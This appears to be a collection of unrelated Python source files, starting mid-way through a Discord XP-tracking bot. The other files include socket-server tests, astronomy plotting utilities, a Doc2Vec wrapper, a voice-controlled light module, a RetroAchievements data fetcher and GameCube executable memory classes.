.filter(IgnoreList.ChannelId == message.channel.id).first()
if not ignoreList:
if len(message.mentions):
for i in list(set(message.mentions)):
if not i.bot and not message.author.bot and not i.id == message.author.id:
XpSys.AddMention(memberId=i.id, serverId=message.guild.id)
xp = len(message.content) / 10
try:
if session.query(BoostList) \
.filter(BoostList.ChannelId == message.channel.parent.id) \
.filter(BoostList.ServerId == message.guild.id).first():
xp *= 2
except AttributeError:
if session.query(BoostList) \
.filter(BoostList.ChannelId == message.channel.id) \
.filter(BoostList.ServerId == message.guild.id).first():
xp *= 2
await XpSys.AddExp(memberId=message.author.id, ServerID=message.guild.id, count=xp, channel=message.channel)
ctx = await self.bot.get_context(message)
for emoji in list(set(re.findall("<\D+\d+>", message.content))):
try:
emj = await commands.EmojiConverter().convert(ctx, emoji)
emojie = session.query(Emojie) \
.filter(Emojie.ServerId == emj.guild.id) \
.filter(Emojie.Id == emj.id).first()
if emojie:
emojie.IncrementUsage()
else:
emojie = Emojie(serverId=emj.guild.id, id=emj.id)
session.add(emojie)
session.commit()
except commands.errors.BadArgument:
pass
@commands.Cog.listener()
async def on_guild_remove(self, guild):
for mem in guild.members:
if not mem.bot:
XpSys.DelMem(mem.id, guild.id)
def setup(client):
client.add_cog(Profile(client))
| python |
config = {
"--beam-delta":[0.5,float],
"--delta":[0.000976562,float],
"--determinize-lattice":['true',str],
"--hash-ratio":[2,float],
"--minimize":['false',str],
"--phone-determinize":['true',str],
"--prune-interval":[25,int],
"--word-determinize":['true',str],
"--minimize":['false',str],
} | python |
import socket
from unittest import TestCase
from ..subprocess_server_manager import SubprocessServerManager, SubprocessServer
from ..exceptions import ImproperlyConfigured
class BaseSocketTestCase(TestCase):
@ staticmethod
def get(host: str, port: int) -> bytes:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
recieved = b''
while data := s.recv(1024):
recieved += data
return recieved
class TestSubprocessServer(BaseSocketTestCase):
def setUp(self):
self.subprocess_server = SubprocessServer(
'127.0.0.1',
6000,
'test message',
)
self.subprocess_server.start()
def tearDown(self):
self.subprocess_server.stop()
def test_server_responds_immediately_after_start_returns(self):
msg = str(self.get('127.0.0.1', 6000), 'utf-8')
self.assertEqual(msg, 'test message')
def test_server_behaves_same_after_restart(self):
self.subprocess_server.restart()
msg = str(self.get('127.0.0.1', 6000), 'utf-8')
self.assertEqual(msg, 'test message')
class TestSubprocessServerManager(TestCase):
"""
Integration test of the SubprocessServerManager. Tests that the manager
class spins up many servers in response to a schema.
"""
def setUp(self):
self.manager = SubprocessServerManager({
'test_server_1': {
'host': '127.0.0.1',
'port': 6001,
'message': 'test server 1 message'
},
'test_server_2': {
'host': '127.0.0.1',
'port': 6002,
'message': 'test server 2 message'
},
'long_message': {
'host': '127.0.0.1',
'port': 6003,
'message': (
'test server 2 messageWe are experiencing strong winds and '
'freezing temperatures." Freezing is describing the '
'temperature, so it is an adjective.'
),
},
})
def tearDown(self):
self.manager.stop()
def test_schema_validation(self):
bad_schemas = [
{
# missing port
'server 1': {
'host': '127.0.0.1',
'message': 'hi',
},
'server 2': {
'host': '127.0.0.1',
'message': 'hi',
},
},
{
# missing host
'server 1': {
'port': 5000,
'message': 'hi',
},
'server 2': {
'port': 5000,
'message': 'hi',
},
},
{
# port is str, not int
'server 1': {
'host': '127.0.0.1',
'port': '1000',
'message': 'hi',
},
'server 2': {
'host': '127.0.0.1',
'port': '1000',
'message': 'hi',
},
},
]
for schema in bad_schemas:
with self.assertRaises(ImproperlyConfigured):
SubprocessServerManager(schema)
def test_two_servers_cannot_request_same_port(self):
schema = {
's1': {
'host': '127.0.0.1',
'port': 1000,
'message': 'hi',
},
's2': {
'host': '127.0.0.1',
'port': 1000,
'message': 'hi',
},
}
with self.assertRaises(ImproperlyConfigured):
SubprocessServerManager(schema)
def test_starts_and_stops(self):
self.manager.start()
| python |
from builtins import zip
from builtins import range
from builtins import object
import os
import numpy as np
import warnings
import matplotlib.pyplot as plt
import rubin_sim.maf.utils as utils
__all__ = ['applyZPNorm', 'PlotHandler', 'BasePlotter']
def applyZPNorm(metricValue, plotDict):
if 'zp' in plotDict:
if plotDict['zp'] is not None:
metricValue = metricValue - plotDict['zp']
if 'normVal' in plotDict:
if plotDict['normVal'] is not None:
metricValue = metricValue / plotDict['normVal']
return metricValue
class BasePlotter(object):
"""
Serve as the base type for MAF plotters and example of API.
"""
def __init__(self):
self.plotType = None
# This should be included in every subsequent defaultPlotDict (assumed to be present).
self.defaultPlotDict = {'title': None, 'xlabel': None, 'label': None,
'labelsize': None, 'fontsize': None, 'figsize': None}
def __call__(self, metricValue, slicer, userPlotDict, fignum=None):
pass
class PlotHandler(object):
def __init__(self, outDir='.', resultsDb=None, savefig=True,
figformat='pdf', dpi=600, thumbnail=True, trimWhitespace=True):
self.outDir = outDir
self.resultsDb = resultsDb
self.savefig = savefig
self.figformat = figformat
self.dpi = dpi
self.trimWhitespace = trimWhitespace
self.thumbnail = thumbnail
self.filtercolors = {'u': 'cyan', 'g': 'g', 'r': 'y',
'i': 'r', 'z': 'm', 'y': 'k', ' ': None}
self.filterorder = {' ': -1, 'u': 0, 'g': 1, 'r': 2, 'i': 3, 'z': 4, 'y': 5}
def setMetricBundles(self, mBundles):
"""
Set the metric bundle or bundles (list or dictionary).
Reuse the PlotHandler by resetting this reference.
The metric bundles have to have the same slicer.
"""
self.mBundles = []
# Try to add the metricBundles in filter order.
if isinstance(mBundles, dict):
for mB in mBundles.values():
vals = mB.fileRoot.split('_')
forder = [self.filterorder.get(f, None) for f in vals if len(f) == 1]
forder = [o for o in forder if o is not None]
if len(forder) == 0:
forder = len(self.mBundles)
else:
forder = forder[-1]
self.mBundles.insert(forder, mB)
self.slicer = self.mBundles[0].slicer
else:
for mB in mBundles:
vals = mB.fileRoot.split('_')
forder = [self.filterorder.get(f, None) for f in vals if len(f) == 1]
forder = [o for o in forder if o is not None]
if len(forder) == 0:
forder = len(self.mBundles)
else:
forder = forder[-1]
self.mBundles.insert(forder, mB)
self.slicer = self.mBundles[0].slicer
for mB in self.mBundles:
if mB.slicer.slicerName != self.slicer.slicerName:
raise ValueError('MetricBundle items must have the same type of slicer')
self._combineMetricNames()
self._combineRunNames()
self._combineMetadata()
self._combineConstraints()
self.setPlotDicts(reset=True)
def setPlotDicts(self, plotDicts=None, plotFunc=None, reset=False):
"""
Set or update (or 'reset') the plotDict for the (possibly joint) plots.
Resolution is:
auto-generated items (colors/labels/titles)
< anything previously set in the plotHandler
< defaults set by the plotter
< explicitly set items in the metricBundle plotDict
< explicitly set items in the plotDicts list passed to this method.
"""
if reset:
# Have to explicitly set each dictionary to a (separate) blank dictionary.
self.plotDicts = [{} for b in self.mBundles]
if isinstance(plotDicts, dict):
# We were passed a single dictionary, not a list.
plotDicts = [plotDicts] * len(self.mBundles)
autoLabelList = self._buildLegendLabels()
autoColorList = self._buildColors()
autoCbar = self._buildCbarFormat()
autoTitle = self._buildTitle()
if plotFunc is not None:
autoXlabel, autoYlabel = self._buildXYlabels(plotFunc)
# Loop through each bundle and generate a plotDict for it.
for i, bundle in enumerate(self.mBundles):
# First use the auto-generated values.
tmpPlotDict = {}
tmpPlotDict['title'] = autoTitle
tmpPlotDict['label'] = autoLabelList[i]
tmpPlotDict['color'] = autoColorList[i]
tmpPlotDict['cbarFormat'] = autoCbar
# Then update that with anything previously set in the plotHandler.
tmpPlotDict.update(self.plotDicts[i])
# Then override with plotDict items set explicitly based on the plot type.
if plotFunc is not None:
tmpPlotDict['xlabel'] = autoXlabel
tmpPlotDict['ylabel'] = autoYlabel
# Replace auto-generated plot dict items with things
# set by the plotterDefaults, if they are not None.
plotterDefaults = plotFunc.defaultPlotDict
for k, v in plotterDefaults.items():
if v is not None:
tmpPlotDict[k] = v
# Then add/override based on the bundle plotDict parameters if they are set.
tmpPlotDict.update(bundle.plotDict)
# Finally, override with anything set explicitly by the user right now.
if plotDicts is not None:
tmpPlotDict.update(plotDicts[i])
# And save this new dictionary back in the class.
self.plotDicts[i] = tmpPlotDict
# Check that the plotDicts do not conflict.
self._checkPlotDicts()
def _combineMetricNames(self):
"""
Combine metric names.
"""
# Find the unique metric names.
self.metricNames = set()
for mB in self.mBundles:
self.metricNames.add(mB.metric.name)
# Find a pleasing combination of the metric names.
order = ['u', 'g', 'r', 'i', 'z', 'y']
if len(self.metricNames) == 1:
jointName = ' '.join(self.metricNames)
else:
# Split each unique name into a list to see if we can merge the names.
nameLengths = [len(x.split()) for x in self.metricNames]
nameLists = [x.split() for x in self.metricNames]
# If the metric names are all the same length, see if we can combine any parts.
if len(set(nameLengths)) == 1:
jointName = []
for i in range(nameLengths[0]):
tmp = set([x[i] for x in nameLists])
# Try to catch special case of filters and put them in order.
if tmp.intersection(order) == tmp:
filterlist = ''
for f in order:
if f in tmp:
filterlist += f
jointName.append(filterlist)
else:
# Otherwise, just join and put into jointName.
jointName.append(''.join(tmp))
jointName = ' '.join(jointName)
# If the metric names are not the same length, just join everything.
else:
jointName = ' '.join(self.metricNames)
self.jointMetricNames = jointName
def _combineRunNames(self):
"""
Combine runNames.
"""
self.runNames = set()
for mB in self.mBundles:
self.runNames.add(mB.runName)
self.jointRunNames = ' '.join(self.runNames)
def _combineMetadata(self):
"""
Combine metadata.
"""
metadata = set()
for mB in self.mBundles:
metadata.add(mB.metadata)
self.metadata = metadata
# Find a pleasing combination of the metadata.
if len(metadata) == 1:
self.jointMetadata = ' '.join(metadata)
else:
order = ['u', 'g', 'r', 'i', 'z', 'y']
# See if there are any subcomponents we can combine,
# splitting on some values we expect to separate metadata clauses.
splitmetas = []
for m in self.metadata:
# Try to split metadata into separate phrases (filter / proposal / constraint..).
if ' and ' in m:
m = m.split(' and ')
elif ', ' in m:
m = m.split(', ')
else:
m = [m, ]
# Strip white spaces from individual elements.
m = set([im.strip() for im in m])
splitmetas.append(m)
# Look for common elements and separate from the general metadata.
common = set.intersection(*splitmetas)
diff = [x.difference(common) for x in splitmetas]
# Now look within the 'diff' elements and see if there are any common words to split off.
diffsplit = []
for d in diff:
if len(d) > 0:
m = set([x.split() for x in d][0])
else:
m = set()
diffsplit.append(m)
diffcommon = set.intersection(*diffsplit)
diffdiff = [x.difference(diffcommon) for x in diffsplit]
# If the length of any of the 'differences' is 0, then we should stop and not try to subdivide.
lengths = [len(x) for x in diffdiff]
if min(lengths) == 0:
# Sort them in order of length (so it goes 'g', 'g dithered', etc.)
tmp = []
for d in diff:
tmp.append(list(d)[0])
diff = tmp
xlengths = [len(x) for x in diff]
idx = np.argsort(xlengths)
diffdiff = [diff[i] for i in idx]
diffcommon = []
else:
# diffdiff is the part where we might expect our filter values to appear;
# try to put this in order.
diffdiffOrdered = []
diffdiffEnd = []
for f in order:
for d in diffdiff:
if len(d) == 1:
if list(d)[0] == f:
diffdiffOrdered.append(d)
for d in diffdiff:
if d not in diffdiffOrdered:
diffdiffEnd.append(d)
diffdiff = diffdiffOrdered + diffdiffEnd
diffdiff = [' '.join(c) for c in diffdiff]
# And put it all back together.
combo = (', '.join([''.join(c) for c in diffdiff]) + ' ' +
' '.join([''.join(d) for d in diffcommon]) + ' ' +
' '.join([''.join(e) for e in common]))
self.jointMetadata = combo
def _combineConstraints(self):
"""
Combine the constraints.
"""
constraints = set()
for mB in self.mBundles:
if mB.constraint is not None:
constraints.add(mB.constraint)
self.constraints = '; '.join(constraints)
def _buildTitle(self):
"""
Build a plot title from the metric names, runNames and metadata.
"""
# Create a plot title from the unique parts of the metric/runName/metadata.
plotTitle = ''
if len(self.runNames) == 1:
plotTitle += list(self.runNames)[0]
if len(self.metadata) == 1:
plotTitle += ' ' + list(self.metadata)[0]
if len(self.metricNames) == 1:
plotTitle += ': ' + list(self.metricNames)[0]
if plotTitle == '':
# If there were more than one of everything above, use joint metadata and metricNames.
plotTitle = self.jointMetadata + ' ' + self.jointMetricNames
return plotTitle
def _buildXYlabels(self, plotFunc):
"""
Build a plot x and y label.
"""
if plotFunc.plotType == 'BinnedData':
if len(self.mBundles) == 1:
mB = self.mBundles[0]
xlabel = mB.slicer.sliceColName + ' (' + mB.slicer.sliceColUnits + ')'
ylabel = mB.metric.name + ' (' + mB.metric.units + ')'
else:
xlabel = set()
for mB in self.mBundles:
xlabel.add(mB.slicer.sliceColName)
xlabel = ', '.join(xlabel)
ylabel = self.jointMetricNames
elif plotFunc.plotType == 'MetricVsH':
if len(self.mBundles) == 1:
mB = self.mBundles[0]
ylabel = mB.metric.name + ' (' + mB.metric.units + ')'
else:
ylabel = self.jointMetricNames
xlabel = 'H (mag)'
else:
if len(self.mBundles) == 1:
mB = self.mBundles[0]
xlabel = mB.metric.name
if mB.metric.units is not None:
if len(mB.metric.units) > 0:
xlabel += ' (' + mB.metric.units + ')'
ylabel = None
else:
xlabel = self.jointMetricNames
ylabel = set()
for mB in self.mBundles:
if 'ylabel' in mB.plotDict:
ylabel.add(mB.plotDict['ylabel'])
if len(ylabel) == 1:
ylabel = list(ylabel)[0]
else:
ylabel = None
return xlabel, ylabel
def _buildLegendLabels(self):
"""
Build a set of legend labels, using parts of the runName/metadata/metricNames that change.
"""
if len(self.mBundles) == 1:
return [None]
labels = []
for mB in self.mBundles:
if 'label' in mB.plotDict:
label = mB.plotDict['label']
else:
label = ''
if len(self.runNames) > 1:
label += mB.runName
if len(self.metadata) > 1:
label += ' ' + mB.metadata
if len(self.metricNames) > 1:
label += ' ' + mB.metric.name
labels.append(label)
return labels
def _buildColors(self):
"""
Try to set an appropriate range of colors for the metric Bundles.
"""
if len(self.mBundles) == 1:
if 'color' in self.mBundles[0].plotDict:
return [self.mBundles[0].plotDict['color']]
else:
return ['b']
colors = []
for mB in self.mBundles:
color = 'b'
if 'color' in mB.plotDict:
color = mB.plotDict['color']
else:
if mB.constraint is not None:
# If the filter is part of the sql constraint, we'll
# try to use that first.
if 'filter' in mB.constraint:
vals = mB.constraint.split('"')
for v in vals:
if len(v) == 1:
# Guess that this is the filter value
if v in self.filtercolors:
color = self.filtercolors[v]
colors.append(color)
# If we happened to end up with the same color throughout
# (say, the metrics were all in the same filter)
# then go ahead and generate random colors.
if (len(self.mBundles) > 1) and (len(np.unique(colors)) == 1):
colors = [np.random.rand(3,) for mB in self.mBundles]
return colors
def _buildCbarFormat(self):
"""
Set the color bar format.
"""
cbarFormat = None
if len(self.mBundles) == 1:
if self.mBundles[0].metric.metricDtype == 'int':
cbarFormat = '%d'
else:
metricDtypes = set()
for mB in self.mBundles:
metricDtypes.add(mB.metric.metricDtype)
if len(metricDtypes) == 1:
if list(metricDtypes)[0] == 'int':
cbarFormat = '%d'
return cbarFormat
def _buildFileRoot(self, outfileSuffix=None):
"""
Build a root filename for plot outputs.
If there is only one metricBundle, this is equal to the metricBundle fileRoot + outfileSuffix.
For multiple metricBundles, this is created from the runNames, metadata and metric names.
If you do not wish to use the automatic filenames, then you could set 'savefig' to False and
save the file manually to disk, using the plot figure numbers returned by 'plot'.
"""
if len(self.mBundles) == 1:
outfile = self.mBundles[0].fileRoot
else:
outfile = '_'.join([self.jointRunNames, self.jointMetricNames, self.jointMetadata])
outfile += '_' + self.mBundles[0].slicer.slicerName[:4].upper()
if outfileSuffix is not None:
outfile += '_' + outfileSuffix
outfile = utils.nameSanitize(outfile)
return outfile
def _buildDisplayDict(self):
"""
Generate a display dictionary.
This is most useful for when there are many metricBundles being combined into a single plot.
"""
if len(self.mBundles) == 1:
return self.mBundles[0].displayDict
else:
displayDict = {}
group = set()
subgroup = set()
order = 0
for mB in self.mBundles:
group.add(mB.displayDict['group'])
subgroup.add(mB.displayDict['subgroup'])
if order < mB.displayDict['order']:
order = mB.displayDict['order'] + 1
displayDict['order'] = order
if len(group) > 1:
displayDict['group'] = 'Comparisons'
else:
displayDict['group'] = list(group)[0]
if len(subgroup) > 1:
displayDict['subgroup'] = 'Comparisons'
else:
displayDict['subgroup'] = list(subgroup)[0]
displayDict['caption'] = ('%s metric(s) calculated on a %s grid, '
'for opsim runs %s, for metadata values of %s.'
% (self.jointMetricNames,
self.mBundles[0].slicer.slicerName,
self.jointRunNames, self.jointMetadata))
return displayDict
def _checkPlotDicts(self):
"""
Check to make sure there are no conflicts in the plotDicts that are being used in the same subplot.
"""
# Check that the length is OK
if len(self.plotDicts) != len(self.mBundles):
raise ValueError('plotDicts (%i) must be same length as mBundles (%i)'
% (len(self.plotDicts), len(self.mBundles)))
# These are the keys that need to match (or be None)
keys2Check = ['xlim', 'ylim', 'colorMin', 'colorMax', 'title']
# Identify how many subplots there are. If there are more than one, just don't change anything.
# This assumes that if there are more than one, the plotDicts are actually all compatible.
subplots = set()
for pd in self.plotDicts:
if 'subplot' in pd:
subplots.add(pd['subplot'])
# Now check subplots are consistent.
if len(subplots) <= 1:
reset_keys = []
for key in keys2Check:
values = [pd[key] for pd in self.plotDicts if key in pd]
if len(np.unique(values)) > 1:
# We will reset some of the keys to the default, but for some we should do better.
if key.endswith('Max'):
for pd in self.plotDicts:
pd[key] = np.max(values)
elif key.endswith('Min'):
for pd in self.plotDicts:
pd[key] = np.min(values)
elif key == 'title':
title = self._buildTitle()
for pd in self.plotDicts:
pd['title'] = title
else:
warnings.warn('Found more than one value to be set for "%s" in the plotDicts.' % (key) +
' Will reset to default value. (found values %s)' % values)
reset_keys.append(key)
# Reset the most of the keys to defaults; this can generally be done safely.
for key in reset_keys:
for pd in self.plotDicts:
pd[key] = None
def plot(self, plotFunc, plotDicts=None, displayDict=None, outfileRoot=None, outfileSuffix=None):
"""
Create plot for mBundles, using plotFunc.
plotDicts: List of plotDicts if one wants to use a _new_ plotDict per MetricBundle.
"""
if not plotFunc.objectPlotter:
# Check that metricValues type and plotter are compatible (most are float/float, but
# some plotters expect object data .. and some only do sometimes).
for mB in self.mBundles:
if mB.metric.metricDtype == 'object':
metricIsColor = mB.plotDict.get('metricIsColor', False)
if not metricIsColor:
warnings.warn('Cannot plot object metric values with this plotter.')
return
# Update x/y labels using plotType.
self.setPlotDicts(plotDicts=plotDicts, plotFunc=plotFunc, reset=False)
# Set outfile name.
if outfileRoot is None:
outfile = self._buildFileRoot(outfileSuffix)
else:
outfile = outfileRoot
plotType = plotFunc.plotType
if len(self.mBundles) > 1:
plotType = 'Combo' + plotType
# Make plot.
fignum = None
for mB, plotDict in zip(self.mBundles, self.plotDicts):
if mB.metricValues is None:
# Skip this metricBundle.
msg = 'MetricBundle (%s) has no attribute "metricValues".' % (mB.fileRoot)
msg += ' Either the values have not been calculated or they have been deleted.'
warnings.warn(msg)
else:
fignum = plotFunc(mB.metricValues, mB.slicer, plotDict, fignum=fignum)
# Add a legend if more than one metricValue is being plotted or if legendloc is specified.
legendloc = None
if 'legendloc' in self.plotDicts[0]:
legendloc = self.plotDicts[0]['legendloc']
if len(self.mBundles) > 1:
try:
legendloc = self.plotDicts[0]['legendloc']
except KeyError:
legendloc = 'upper right'
if legendloc is not None:
plt.figure(fignum)
plt.legend(loc=legendloc, fancybox=True, fontsize='smaller')
# Add the super title if provided.
if 'suptitle' in self.plotDicts[0]:
plt.suptitle(self.plotDicts[0]['suptitle'])
# Save to disk and file info to resultsDb if desired.
if self.savefig:
if displayDict is None:
displayDict = self._buildDisplayDict()
self.saveFig(fignum, outfile, plotType, self.jointMetricNames, self.slicer.slicerName,
self.jointRunNames, self.constraints, self.jointMetadata, displayDict)
return fignum
def saveFig(self, fignum, outfileRoot, plotType, metricName, slicerName,
runName, constraint, metadata, displayDict=None):
fig = plt.figure(fignum)
plotFile = outfileRoot + '_' + plotType + '.' + self.figformat
if self.trimWhitespace:
fig.savefig(os.path.join(self.outDir, plotFile), dpi=self.dpi,
bbox_inches='tight', format=self.figformat)
else:
fig.savefig(os.path.join(self.outDir, plotFile), dpi=self.dpi, format=self.figformat)
# Generate a png thumbnail.
if self.thumbnail:
thumbFile = 'thumb.' + outfileRoot + '_' + plotType + '.png'
plt.savefig(os.path.join(self.outDir, thumbFile), dpi=72, bbox_inches='tight')
# Save information about the file to resultsDb.
if self.resultsDb:
if displayDict is None:
displayDict = {}
metricId = self.resultsDb.updateMetric(metricName, slicerName, runName, constraint,
metadata, None)
self.resultsDb.updateDisplay(metricId=metricId, displayDict=displayDict, overwrite=False)
self.resultsDb.updatePlot(metricId=metricId, plotType=plotType, plotFile=plotFile)
| python |
'''
Created on Jan, 2017
@author: hugo
'''
from __future__ import absolute_import
import multiprocessing
from gensim.models import Doc2Vec
class MyDoc2Vec(object):
def __init__(self, dim, hs=0, window=5, negative=5, epoches=5, dm=1, dm_concat=1):
super(MyDoc2Vec, self).__init__()
self.dim = dim
self.hs = hs
self.window = window
self.negative = negative
self.epoches = epoches
self.dm = dm
self.dm_concat = dm_concat
def train(self, corpus):
self.model = Doc2Vec(min_count=1, window=self.window, size=self.dim, \
workers=multiprocessing.cpu_count(), hs=self.hs,\
negative=self.negative, iter=1, dm=self.dm, dm_concat=self.dm_concat)
self.model.build_vocab(corpus())
for each in range(self.epoches):
self.model.train(corpus())
return self
def predict(model, corpus):
doc_codes = {}
for doc_words, doc_name in corpus():
doc_codes[doc_name[0]] = model.infer_vector(doc_words).tolist()
return doc_codes
def save_doc2vec(model, outfile):
model.save(outfile)
def load_doc2vec(mod_file):
return Doc2Vec.load(mod_file)
| python |
# -*- coding: utf-8-*-
import random
import re
import sys
sys.path.append('/home/pi/Desktop/autoh/Lights')
from serial_led import serialControl
WORDS = ["TURN", "THE", "LIGHT", "ON"]
def lightno(mic):
text=mic.activeListen()
if text=="ONE" or text=="1":
mic.say("Turning light one on")
serialControl("2000")
elif text=="TWO" or text=="2":
mic.say("Turning light two on")
serialControl("3000")
elif text=="THREE" or text=="3":
mic.say("Turning light three on")
serialControl("4000")
elif text=="FOUR" or text=="4":
mic.say("Turning light four on")
serialControl("5000")
else:
mic.say("Sorry I don't think I can do that")
lightno(mic)
def handle(text, mic, profile):
"""
Responds to user-input, typically speech text, by relaying the
meaning of life.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)"""
messages = ["WHICH ONE, SIR?",
"WHICH LIGHT DO YOU WANT ME TO TURN ON? "]
message = random.choice(messages)
mic.say(message)
lightno(mic)
def isValid(text):
return bool(re.search(r'\bturn the light on\b', text, re.IGNORECASE))
| python |
#!/usr/bin/python3
# Copyright 2022 Sam Steele
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests, sys
from datetime import datetime, date, timedelta, time
from config import *
if not RA_API_KEY:
logging.error("RA_API_KEY not set in config.py")
sys.exit(1)
points = []
connect(RA_DATABASE)
end = datetime.utcnow().timestamp()
start = end - 604800
try:
response = requests.get('https://retroachievements.org/API/API_GetAchievementsEarnedBetween.php',
params={'z': RA_USERNAME, 'y': RA_API_KEY, 'u': RA_USERNAME, 'f': start, 't': end})
response.raise_for_status()
except requests.exceptions.HTTPError as err:
logging.error("HTTP request failed: %s", err)
sys.exit(1)
data = response.json()
logging.info("Got %s achievements from RetroAchievements", len(data))
for achievement in data:
date = datetime.strptime(achievement['Date'], "%Y-%m-%d %H:%M:%S")
points.append({
"measurement": "achievement",
"time": date.isoformat(),
"tags": {
"player_id": RA_USERNAME,
"platform": achievement['ConsoleName'],
"player_name": RA_USERNAME,
"title": achievement['GameTitle'],
"application_id": str(achievement['GameID']),
"apiname": str(achievement['AchievementID']),
},
"fields": {
"name": achievement['Title'],
"description": achievement['Description'],
"icon": f'https://retroachievements.org{achievement["BadgeURL"]}'
}
})
write_points(points)
| python |
import copy
import enum
import logging
from pathlib import Path
import re
__version__ = "0.0.9"
__author__ = "rigodron, algoflash, GGLinnk"
__license__ = "MIT"
__status__ = "developpement"
# raised when the action replay ini file contains a bad formated entry
class InvalidIniFileEntryError(Exception): pass
# raised when trying to resolve an invalid dol file offset
class InvalidImgOffsetError(Exception): pass
# raised when trying to resolve an out of section Virtual address
class InvalidVirtualAddressError(Exception): pass
# raised when Virtual address + length Overflow out of sections
class SectionsOverflowError(Exception): pass
# raised when Virtual address + length is out of main program space memory
class OutOfMemoryError(Exception): pass
# raised when Virtual address of used section is unaligned to 32 bytes
class InvalidSectionAlignError(Exception): pass
# raised when Section offset does not match current file datas
class InvalidSectionOffsetError(Exception): pass
def align_bottom(address:int, align:int):
if address % align == 0: return address
return address - address % align
def align_top(address:int, align:int):
if address % align == 0: return address
return address + align - (address % align)
class SectionType(enum.IntFlag):
DATA = 0
TEXT = 1
BSS = 2
SYS = 3
UNMAPPED = 4
class IntervalDiv(enum.IntFlag):
LEFT = 0
IN = 1
RIGHT = 2
class MemoryObject:
__locked_address_space = None
__type = None
__name = None
__address = None
__end_address = None
__length = None
__datas = None
def __init__(self, address:int, section_type:SectionType = SectionType.UNMAPPED, name:str = None, length:int = None, end_address:int = None, locked_address_space:bool = True):
if length is None:
if end_address is None:
raise Exception("Error - length or end_address has to be specified.")
self.__end_address = end_address
self.__length = end_address - address
else:
self.__length = length
self.__end_address = address + length
if section_type == section_type.SYS or not locked_address_space:
self.__locked_address_space = False
else:
self.__locked_address_space = True
if not 0x80003100 <= address < 0x81200000 or not 0x80003100 < self.__end_address <= 0x81200000:
raise OutOfMemoryError(f"Error - Out of memory address: {address:08x}:{self.__end_address:08x}: should be in 0x80003100:0x81200000.")
self.__type = section_type
self.__name = name
self.__address = address
def __str__(self):
return f"| {str(self.name()).ljust(11)} | {self.address():08x} | {self.end_address():08x} | {self.length():08x} |"
def __sub__(interval:'MemoryObject', intervals_to_remove:list):
"""
Get non-overlapping intervals from interval by removing intervals_to_remove
input: interval = MemoryObject
input: intervals_to_remove = [ MemoryObject, ... ]
return [MemoryObject, ...] or None
* sorted by address
"""
interval = copy.deepcopy(interval)
intervals_to_remove.sort(key=lambda x: x.address())
result_memory_objects = []
for interval_to_remove in intervals_to_remove:
if interval_to_remove < interval: continue # end before
if interval_to_remove > interval: break # begin after
if interval in interval_to_remove: return result_memory_objects if result_memory_objects != [] else None # total overlap
# begin truncate
if interval_to_remove.address() <= interval.address():
interval.set_address(interval_to_remove.end_address())
continue
result_memory_objects.append(MemoryObject(interval.address(), interval.type(), interval.name(), end_address=interval_to_remove.address()))
# end truncate
if interval_to_remove.end_address() >= interval.end_address():
return result_memory_objects
# interval.address() < interval_to_remove < interval.end_address()
interval.set_address( interval_to_remove.end_address() )
continue
if interval.length() > 0:
result_memory_objects.append(interval)
return result_memory_objects if result_memory_objects != [] else None
def __lt__(a, b): return a.end_address() <= b.address()
def __le__(a, b): return b.address() < a.end_address() <= b.end_address() and a.address() < b.address()
def __ge__(a, b): return b.address() <= a.address() < b.end_address() and a.end_address() > b.end_address()
def __gt__(a, b): return a.address() >= b.end_address()
def __contains__(a, b): return b.address() >= a.address() and b.end_address() <= a.end_address()
def __and__(a, b): return a.address() < b.end_address() and a.end_address() > b.address() # Intersect
def __truediv__(a, b):
"""
Description: Split a using b by creating before_b, in_b, after_b intervals
input: a = MemoryObject or inherited class
input: b = MemoryObject or inherited class
return: {IntervalDiv: splited_copy, ... } or None
"""
if not a & b: return None
result = {}
if a.address() < b.address():
new_left = copy.deepcopy(a)
new_left.set_end_address(b.address())
new_left.set_datas( new_left.datas()[:new_left.length()] )
a.set_address(b.address())
a.set_datas( a.datas()[-a.length():] )
result[IntervalDiv.LEFT] = new_left
if a.end_address() > b.end_address():
new_right = copy.deepcopy(a)
new_right.set_address(b.end_address())
new_right.set_datas( new_right.datas()[-new_right.length():] )
a.set_end_address(b.end_address())
a.set_datas( a.datas()[:a.length()] )
result[IntervalDiv.RIGHT] = new_right
result[IntervalDiv.IN] = a
return result if len(result) > 0 else None
#__eq__(a, b)
def type(self): return self.__type
def name(self): return self.__name
def address(self): return self.__address
def end_address(self): return self.__end_address
def length(self): return self.__length
def datas(self): return self.__datas
def set_name(self, name:str): self.__name = name
def set_address(self, address:int):
if self.__locked_address_space and not 0x80003100 <= address < 0x81200000:
raise OutOfMemoryError(f"Error - Out of memory address: {address:08x} should be 0x80003100 <= address < 0x81200000.")
self.__address = address
self.__length = self.__end_address - address
def set_end_address(self, address:int):
if self.__locked_address_space and not 0x80003100 < address <= 0x81200000:
raise OutOfMemoryError(f"Error - Out of memory end_address: {address:08x} should be 0x80003100 < end_address <= 0x81200000.")
self.__end_address = address
self.__length = address - self.__address
def set_datas(self, datas:bytes):
self.__datas = datas
def set_type(self, section_type:SectionType):
self.__type = section_type
def update_datas(self, memory_object:'MemoryObject'):
if not memory_object in self:
raise Exception("Error - Invalid update adresses.")
if len(memory_object.datas()) != memory_object.length():
raise Exception("Error - length does not match the datas length.")
self.__datas = bytearray(self.__datas)
offset = memory_object.address() - self.address()
self.__datas[offset: offset + memory_object.length()] = memory_object.datas()
def to_memory_object(self): return MemoryObject(self.address(), self.type(), self.name(), length=self.length())
def align(self):
self.set_address( align_bottom(self.address(), 32) )
self.set_end_address( align_top(self.end_address(), 32) )
class Section(MemoryObject):
__index = None
__offset = None
__is_used = None
def __init__(self, index:int, offset:int, address:int, length:int, section_type:SectionType = None):
if section_type is None:
section_type = SectionType.TEXT if index < 7 else SectionType.DATA
super().__init__(address, section_type, length=length, locked_address_space=False)
self.__index = index
self.__offset = offset
if self.is_used():
# Section virtual address has to be aligned to 32 bytes.
if self.address() % 32 != 0:
raise InvalidSectionAlignError(f"Error - Section {index} is not aligned to 32 bytes.")
def index(self): return self.__index
def offset(self): return self.__offset
def set_index(self, index:int): self.__index = index
